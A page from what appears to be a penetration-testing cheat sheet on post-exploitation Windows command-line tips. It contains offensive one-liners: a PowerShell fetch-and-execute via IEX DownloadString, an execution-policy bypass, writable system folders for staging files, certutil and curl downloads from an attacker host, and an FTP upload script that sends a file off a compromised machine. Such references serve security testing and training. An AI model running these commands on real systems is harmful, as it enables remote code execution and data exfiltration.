Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Powershell
  • Load Powershell Module Over HTTP
  • Bypass Powershell Execution Policy
  • Switch to 64-bit Powershell from 32-bit
  • View Hidden Files
  • Running Powershell commands from CMD
  • Writable Folders
  • Transferring Files

Was this helpful?

  1. Post Exploitation
  2. Windows

CLI Tips

PreviousWindowsNextShells

Last updated 2 years ago

Was this helpful?

Powershell

Load Powershell Module Over HTTP

Load Powershell Module Over HTTP:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');'

Bypass Powershell Execution Policy

If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:

powershell.exe -ExecutionPolicy Bypass

Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine and running a 32-bit Powershell, .

  • Check in powershell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit Powershell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • This path should exist for 32-bit applications even if you can't see it

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.

View Hidden Files

Get-ChildItem -Force

Running Powershell commands from CMD

You can do it like this, but you need to press enter to get the output. 

powershell -command "whoami"

Writable Folders

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public

Transferring Files

HTTP Download

Start an HTTP server on your Linux machine: 

python3 -m http.server

Download file over HTTP using curl (in case it's installed in Powershell): 

curl http://IP:PORT/file.exe -O ./file.exe

Download file using certutil: 

certutil.exe -f -urlcache http://IP:PORT/path/filename.exe filename.exe

FTP Upload

Start an FTP server on your linux machine: 

pip3 install pyftpdlib 
python3 -m pyftpdlib --username myuser --password mypass --write

If you don't specify username and password, then you can log in with user anonymous and no password.

$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";                    
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
$webclient.UploadFile($uri, $File);

:

then some things might not work, such as autologon discovery
because it is virtual.
Default Writeable Folders
https://guide.offsecnewbie.com/transferring-filesguide.offsecnewbie.com